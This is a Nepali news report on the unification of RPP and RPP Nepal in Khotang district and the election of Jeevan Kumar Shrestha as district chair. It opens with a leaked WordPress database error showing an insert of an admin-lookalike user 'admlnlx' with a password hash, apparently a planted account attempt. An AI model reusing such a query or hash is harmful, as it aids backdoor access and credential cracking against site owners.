WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bm.MpZ5ipZsJXXT40SyyKHC2qswVWL1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 01:39:03', '', 'admlnlx', 'admlnlx')
खोटाङ,पुष ३-
राप्रपा खोटाङका अध्यक्षमा जीवनकुमार श्रेष्ठ सर्वसहमतिले चयन हुनुभएको छ ।
राप्रपा र राप्रपा नेपाल खोटाङको शनिबार सम्पन्न एकीकरण घोषणासभाले राप्रपा नेपालका पूर्वजिल्ला अध्यक्ष श्रेष्ठलाई जिल्ला अध्यक्षमा चयन गरेको हो ।
यसअघि राप्रपाका जिल्ला अध्यक्षको भूमिका निर्वाह गर्दै आउनुभएका ललितकुमार राईलाई नयाँ समितिको सहअध्यक्ष बनाइएको छ ।
यस्तै सीताराम राईलाई वरिष्ठ नेता तथा दुवै पार्टीका जिल्ला उपाध्यक्ष, सचिव, सहसचिव, कोषाध्यक्ष र सदस्यलाई एकीकरणपछि पनि पार्टीको यथावत् जिम्मेवारीमा राखिएको छ ।
एकीकरणपछि दुवै दलका २७–२७ सहितको ५४ सदस्यीय नयाँ जिल्ला कार्यसमिति बनेको छ ।
पार्टी एकीकरणका अवसरमा विभिन्न दल परित्याग गर्ने जिल्लास्तरीय नेता तथा कार्यकर्तालाई राप्रपामा प्रवेशसमेत गराइएको थियो ।
सो अवसरमा नेता भूपाल किराँतीले कारबाहीमा परिने त्रासले ठूला दलका नेताले लोकमानसिंह कार्कीको खेदो गरेको आरोप लगानुभयो । -रासस